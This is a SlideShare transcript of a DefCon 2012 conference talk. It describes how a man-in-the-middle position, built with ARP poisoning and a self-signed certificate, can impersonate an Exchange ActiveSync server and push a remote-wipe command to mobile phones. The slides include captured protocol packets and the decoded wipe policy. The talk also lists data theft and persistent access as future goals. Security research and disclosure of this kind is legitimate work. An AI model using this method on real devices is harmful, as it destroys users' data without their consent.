Your SlideShare is downloading. ×
0
Edith Cowan UniversitySchool of Computer & Security Science                           Exchanging Demands                  ...
Edith Cowan UniversitySchool of Computer & Security Science          The Introduction
Edith Cowan UniversitySchool of Computer & Security Science                                        Who am I?  •     Lectur...
Edith Cowan UniversitySchool of Computer & Security Science                                        Interests  •  Breaking ...
Edith Cowan UniversitySchool of Computer & Security Science          The Story          INSPIRATION
Edith Cowan UniversitySchool of Computer & Security Science                                        The Setting  •  Post pe...
Edith Cowan UniversitySchool of Computer & Security Science                                        Inspiration  •  Do we r...
Edith Cowan UniversitySchool of Computer & Security Science          THAT COULDN’T POSSIBLY WORK
Edith Cowan UniversitySchool of Computer & Security Science                                        Surely not…  •  It coul...
Edith Cowan UniversitySchool of Computer & Security Science                                        AN EXPERT OPINION  •  I...
Edith Cowan UniversitySchool of Computer & Security Science          TIME TO GET STARTED
Edith Cowan UniversitySchool of Computer & Security Science                                        Exchange!  •  Let’s get...
Edith Cowan UniversitySchool of Computer & Security Science                  Some students I had hanging around
Edith Cowan UniversitySchool of Computer & Security Science                                        Packet Sniffing - Provi...
Edith Cowan UniversitySchool of Computer & Security Science                                                     Packet Sni...
Edith Cowan UniversitySchool of Computer & Security Science                                                               ...
Edith Cowan UniversitySchool of Computer & Security Science                                                               ...
Edith Cowan UniversitySchool of Computer & Security Science          The Background
Edith Cowan UniversitySchool of Computer & Security Science                                        Structure
Edith Cowan UniversitySchool of Computer & Security Science                                                               ...
Edith Cowan UniversitySchool of Computer & Security Science                                        Targets
Edith Cowan UniversitySchool of Computer & Security Science                                        MiTM  •  WiFi is cool, ...
Edith Cowan UniversitySchool of Computer & Security Science          The Dance          LETS WIPE
Edith Cowan UniversitySchool of Computer & Security Science                                        Step 1: Request  •  Acc...
Edith Cowan UniversitySchool of Computer & Security Science                                        Step 2: Provision  •  S...
Edith Cowan UniversitySchool of Computer & Security Science                                        Step 3: Wipe  •  Send p...
Edith Cowan UniversitySchool of Computer & Security Science                                        Demo Time  •  Oh no L ...
Edith Cowan UniversitySchool of Computer & Security Science          Future Work
Edith Cowan UniversitySchool of Computer & Security Science              Compulsory OSS Project: Protocol Library  •  Emul...
Edith Cowan UniversitySchool of Computer & Security Science                                        Lofty Goal: Data Theft ...
Edith Cowan UniversitySchool of Computer & Security Science                                        Lofty Goal: Ongoing Acc...
Edith Cowan UniversitySchool of Computer & Security Science          Concluding…
Edith Cowan UniversitySchool of Computer & Security Science                                        Thanks!  •     Andrew K...
Edith Cowan UniversitySchool of Computer & Security Science          Thanks for Listening!          ANY QUESTIONS?!
Upcoming SlideShare
Loading in...5
×

DefCon 2012 - Hacking MS Exchange Mobile Client

1,570

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,570
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
8
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Transcript of "DefCon 2012 - Hacking MS Exchange Mobile Client"

  1. 1. Edith Cowan UniversitySchool of Computer & Security Science Exchanging Demands Peter Hannay peter@hannay.id.au
  2. 2. Edith Cowan UniversitySchool of Computer & Security Science The Introduction
  3. 3. Edith Cowan UniversitySchool of Computer & Security Science Who am I? •  Lecturer •  Researcher •  Hacker •  Pentester •  PhD Candidate
  4. 4. Edith Cowan UniversitySchool of Computer & Security Science Interests •  Breaking things •  Laser tag •  Cats
  5. 5. Edith Cowan UniversitySchool of Computer & Security Science The Story INSPIRATION
  6. 6. Edith Cowan UniversitySchool of Computer & Security Science The Setting •  Post pentest drinks with client •  … So if you own the active directory server what exactly can you do? •  The norm, control of every user, ability to push policy updates, etc… •  Exchange can remotely wipe devices, so why not that too?
  7. 7. Edith Cowan UniversitySchool of Computer & Security Science Inspiration •  Do we really need exchange for that though? •  Maybe we just send the phone those commands directly •  but…
  8. 8. Edith Cowan UniversitySchool of Computer & Security Science THAT COULDN’T POSSIBLY WORK
  9. 9. Edith Cowan UniversitySchool of Computer & Security Science Surely not… •  It couldn’t be that easy could it? •  Surely SSL would prevent this if nothing else. •  Maybe it uses some sort of secure exchange, shared secrets, something…
  10. 10. Edith Cowan UniversitySchool of Computer & Security Science AN EXPERT OPINION •  I had a talk with a Microsoft Exchange admin type person… •  “It should work fine, as long as SSL is disabled” •  Damn.. Well, lets try it out anyway!
  11. 11. Edith Cowan UniversitySchool of Computer & Security Science TIME TO GET STARTED
  12. 12. Edith Cowan UniversitySchool of Computer & Security Science Exchange! •  Let’s get some packet dumps of a legit wipe operation •  Exchange can’t be that hard to install right? I’ve done postfix & sendmail before.. •  Crap.
  13. 13. Edith Cowan UniversitySchool of Computer & Security Science Some students I had hanging around
  14. 14. Edith Cowan UniversitySchool of Computer & Security Science Packet Sniffing - Provisioning POST  /Microsoft-­‐Server-­‐ActiveSync?Cmd=...........&DeviceType=Android  HTTP/1.1   Content-­‐Type:  application/vnd.ms-­‐sync.wbxml   Authorization:  Basic  ZnVja2VyeS5mdWNrXGRpcnQ6cGFzc3dvcmQxMjMk   MS-­‐ASProtocolVersion:  12.0   Connection:  keep-­‐alive   User-­‐Agent:  Android/0.3   X-­‐MS-­‐PolicyKey:  358347207   Content-­‐Length:  13   Host:  192.168.1.218     HTTP/1.1  449  Retry  after  sending  a  PROVISION  command   Cache-­‐Control:  private   Content-­‐Type:  text/html   Server:  Microsoft-­‐IIS/7.5   MS-­‐Server-­‐ActiveSync:  14.0   X-­‐AspNet-­‐Version:  2.0.50727   X-­‐Powered-­‐By:  ASP.NET   Date:  Tue,  08  May  2012  07:08:22  GMT   Content-­‐Length:  54     The  custom  error  module  does  not  recognize  this  error.  
  15. 15. Edith Cowan UniversitySchool of Computer & Security Science Packet Sniffing - Wipe POST  /Microsoft-­‐Server-­‐ActiveSync?Cmd=Provision&User=........&DeviceType=Android  HTTP/1.1   Content-­‐Type:  application/vnd.ms-­‐sync.wbxml   Authorization:  Basic  ZnVja2VyeS5mdWNrXGRpcnQ6cGFzc3dvcmQxMjMk   MS-­‐ASProtocolVersion:  12.0   Connection:  keep-­‐alive   User-­‐Agent:  Android/0.3   X-­‐MS-­‐PolicyKey:  0   Content-­‐Length:  41   Host:  192.168.1.218     ..j...EFGH.MS-­‐EAS-­‐Provisioning-­‐WBXML.....HTTP/1.1  200  OK   Cache-­‐Control:  private   Content-­‐Type:  application/vnd.ms-­‐sync.wbxml   Server:  Microsoft-­‐IIS/7.5   MS-­‐Server-­‐ActiveSync:  14.0   Date:  Tue,  08  May  2012  07:00:04  GMT   Content-­‐Length:  123     ..j...EK.1..FGH.MS-­‐EAS-­‐Provisioning-­‐WBXML..K.1..I.2761868790..JMN.0..O.0..Q.0..P.0..S.1..T.4..U.900..   V.8...X.1...Z.0.......  
  16. 16. Edith Cowan UniversitySchool of Computer & Security Science Binary Protocols 00000000    48  54  54  50  2f  31  2e  31    20  32  30  30  20  4f  4b  0d  HTTP/1.1    200  OK.   00000010    0a  43  61  63  68  65  2d  43    6f  6e  74  72  6f  6c  3a  20  .Cache-­‐C  ontrol:     00000020    70  72  69  76  61  74  65  0d    0a  43  6f  6e  74  65  6e  74  private.  .Content   00000030    2d  54  79  70  65  3a  20  61    70  70  6c  69  63  61  74  69  -­‐Type:  a  pplicati   00000040    6f  6e  2f  76  6e  64  2e  6d    73  2d  73  79  6e  63  2e  77  on/vnd.m  s-­‐sync.w   00000050    62  78  6d  6c  0d  0a  53  65    72  76  65  72  3a  20  4d  69  bxml..Se  rver:  Mi   00000060    63  72  6f  73  6f  66  74  2d    49  49  53  2f  37  2e  35  0d  crosoft-­‐  IIS/7.5.   00000070    0a  4d  53  2d  53  65  72  76    65  72  2d  41  63  74  69  76  .MS-­‐Serv  er-­‐Activ   00000080    65  53  79  6e  63  3a  20  31    34  2e  30  0d  0a  44  61  74  eSync:  1  4.0..Dat   00000090    65  3a  20  54  75  65  2c  20    30  38  20  4d  61  79  20  32  e:  Tue,    08  May  2   000000A0    30  31  32  20  30  37  3a  30    30  3a  30  34  20  47  4d  54  012  07:0  0:04  GMT   000000B0    0d  0a  43  6f  6e  74  65  6e    74  2d  4c  65  6e  67  74  68  ..Conten  t-­‐Length   000000C0    3a  20  31  32  33  0d  0a  0d    0a  03  01  6a  00  00  0e  45  :  123...  ...j...E   000000D0    4b  03  31  00  01  46  47  48    03  4d  53  2d  45  41  53  2d  K.1..FGH  .MS-­‐EAS-­‐   000000E0    50  72  6f  76  69  73  69  6f    6e  69  6e  67  2d  57  42  58  Provisio  ning-­‐WBX   000000F0    4d  4c  00  01  4b  03  31  00    01  49  03  32  37  36  31  38  ML..K.1.  .I.27618   00000100    36  38  37  39  30  00  01  4a    4d  4e  03  30  00  01  4f  03  68790..J  MN.0..O.   00000110    30  00  01  51  03  30  00  01    50  03  30  00  01  53  03  31  0..Q.0..  P.0..S.1   00000120    00  01  54  03  34  00  01  55    03  39  30  30  00  01  56  03  ..T.4..U  .900..V.   00000130    38  00  01  17  58  03  31  00    01  19  5a  03  30  00  01  01  8...X.1.  ..Z.0...   00000140    01  01  01  01                                                                            ....  
  17. 17. Edith Cowan UniversitySchool of Computer & Security Science Decoded <Provision>        <Status>1</Status>        <Policies>              <Policy>                    <PolicyType>MS-­‐EAS-­‐Provisioning-­‐WBXML</PolicyType>                    <Status>1</Status>                    <PolicyKey>2761868790</PolicyKey>                    <Data>                          <EASProvisionDoc>                                <DevicePasswordEnabled>0</DevicePasswordEnabled>                                <AlphanumericDevicePasswordRequired>0</AlphanumericDevicePasswordRequired>                                <PasswordRecoveryEnabled>0</PasswordRecoveryEnabled>                                <DeviceEncryptionEnabled>0</DeviceEncryptionEnabled>                                <AttachmentsEnabled>1</AttachmentsEnabled>                                <MinDevicePasswordLength>4</MinDevicePasswordLength>                                <MaxInactivityTimeDeviceLock>900</MaxInactivityTimeDeviceLock>                                <MaxDevicePasswordFailedAttempts>8</MaxDevicePasswordFailedAttempts>                                <MaxAttachmentSize  />                                <AllowSimpleDevicePassword>1</AllowSimpleDevicePassword>                                <DevicePasswordExpiration  />                                <DevicePasswordHistory>0</DevicePasswordHistory>                          </EASProvisionDoc>                    </Data>              </Policy>        </Policies>        <RemoteWipe  />   </Provision>  
  18. 18. Edith Cowan UniversitySchool of Computer & Security Science The Background
  19. 19. Edith Cowan UniversitySchool of Computer & Security Science Structure
  20. 20. Edith Cowan UniversitySchool of Computer & Security Science Policy <DevicePasswordEnabled>0</DevicePasswordEnabled>   <AlphanumericDevicePasswordRequired>0</AlphanumericDevicePasswordRequired>   <PasswordRecoveryEnabled>0</PasswordRecoveryEnabled>   <DeviceEncryptionEnabled>0</DeviceEncryptionEnabled>   <AttachmentsEnabled>1</AttachmentsEnabled>   <MinDevicePasswordLength>4</MinDevicePasswordLength>   <MaxInactivityTimeDeviceLock>900</MaxInactivityTimeDeviceLock>   <MaxDevicePasswordFailedAttempts>8</MaxDevicePasswordFailedAttempts>   <MaxAttachmentSize  />   <AllowSimpleDevicePassword>1</AllowSimpleDevicePassword>   <DevicePasswordExpiration  />   <DevicePasswordHistory>0</DevicePasswordHistory>   </EASProvisionDoc>  
  21. 21. Edith Cowan UniversitySchool of Computer & Security Science Targets
  22. 22. Edith Cowan UniversitySchool of Computer & Security Science MiTM •  WiFi is cool, phones have WiFi •  ARP Poisoning •  Pineapple
  23. 23. Edith Cowan UniversitySchool of Computer & Security Science The Dance LETS WIPE
  24. 24. Edith Cowan UniversitySchool of Computer & Security Science Step 1: Request •  Accept connection •  Use a shonky self signed SSL cert
  25. 25. Edith Cowan UniversitySchool of Computer & Security Science Step 2: Provision •  Send HTTP error 449
  26. 26. Edith Cowan UniversitySchool of Computer & Security Science Step 3: Wipe •  Send policy push containing wipe command •  Celebrate.
  27. 27. Edith Cowan UniversitySchool of Computer & Security Science Demo Time •  Oh no L •  Lets hope this works….
  28. 28. Edith Cowan UniversitySchool of Computer & Security Science Future Work
  29. 29. Edith Cowan UniversitySchool of Computer & Security Science Compulsory OSS Project: Protocol Library •  Emulate ActiveSync Protocol •  Allow for projects to interact with mobile clients in new ways •  Translation layer between exchange clients and other servers •  Lots of things!
  30. 30. Edith Cowan UniversitySchool of Computer & Security Science Lofty Goal: Data Theft •  Wouldn’t it be nice if we could get data back off the phones •  Remote backup functionality •  Sync features •  Hopefully possible!
  31. 31. Edith Cowan UniversitySchool of Computer & Security Science Lofty Goal: Ongoing Access •  What sort of configuration options can we set? •  Anything undocumented? •  Can we reconfigure the device to point at another server?
  32. 32. Edith Cowan UniversitySchool of Computer & Security Science Concluding…
  33. 33. Edith Cowan UniversitySchool of Computer & Security Science Thanks! •  Andrew Kitis •  Rob McKnight •  Randal Adamson •  Sid •  Murray Brand •  Clinton Carpene •  #nodavesclub •  #cduc •  #kiwicon
  34. 34. Edith Cowan UniversitySchool of Computer & Security Science Thanks for Listening! ANY QUESTIONS?!
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×